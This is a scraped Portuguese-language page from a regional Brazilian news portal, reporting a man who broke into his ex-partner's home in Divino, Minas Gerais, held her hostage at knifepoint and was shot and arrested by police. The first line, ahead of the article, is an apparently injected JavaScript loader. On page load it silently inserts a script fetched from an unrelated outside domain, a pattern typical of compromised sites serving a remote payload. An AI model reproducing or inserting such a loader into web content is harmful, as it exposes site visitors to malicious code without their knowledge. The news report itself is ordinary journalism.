;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Homem invade casa e faz mulher refém. - Portal Carangola

www.portalcarangola.com

O primeiro portal de notícias de Carangola-MG e região.

Portal Carangola

O 1º site de notícias de Carangola e Região

Homem invade casa e faz mulher refém.

policiaDIVINO (MG) – O homem, apenas identificado pelo primeiro nome, Etelvino, saiu de um baile na cidade de Divino, falando que mataria a ex-companheira. Ele foi preso pela Polícia Militar (PM), por volta das 05h:00 deste domingo na Rua Ildefonso Frossard, no Centro da cidade, depois de entrar na casa da vítima, pegar uma faca no armário e fazer a ex-companheira refém. Etelvino chegou a acertar várias facadas na vítima, que só foi libertada depois de a polícia atirar contra o autor. Na casa, dormiam quatro pessoas, entre elas um bebê de apenas sete meses.
De acordo com testemunhas, Etelvino estava em um baile avisando que iria matar a ex-companheira, e estava sob efeito de álcool e aparentando estar drogado. Ele saiu do baile, retirou algumas telhas do telhado e entrou na casa da vítima, pegou uma faca no armário e fez a mulher de refém, ameaçando dar uma facada no pescoço dela.
Depois de avistar os policiais chegando à casa, Etelvino ficou mais exaltado. Os militares tentaram argumentar com o autor, mas ele ficava mais violento e intensificava as ameaças, chegando a pressionar a faca contra o pescoço da ex-companheira e cortar um dos dedos dela enquanto tentava segurar a faca.
Apesar da negociação e dos avisos insistentes dos policiais sobre ter de usar a força para impedir o crime, Etelvino tentou cortar o pescoço da refém, quando um dos policiais atirou na perna direita do autor, que mesmo assim continuou a agredir a vítima. Ele precisou ser contido pelos militares.
Etelvino foi levado para o Pronto Atendimento Médico de Divino (Pam) e depois encaminhado para a Casa de Caridade de Carangola e depois preso.
A mãe da vítima disse que dormia junto som os dois filhos e a neta, de apenas sete meses de vida. Segundo ela, Etelvino disse que mataria a todos, e pouparia apenas a bebê.
A perícia esteve no local, a arma e as munições que estavam com o policial militar que efetuou o disparo foram recolhidas.

Informação:Jornal “O Campeão”/Clint Paolo – Canal da Se

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

Esse site utiliza o Akismet para reduzir spam. Aprenda como seus dados de comentários são processados.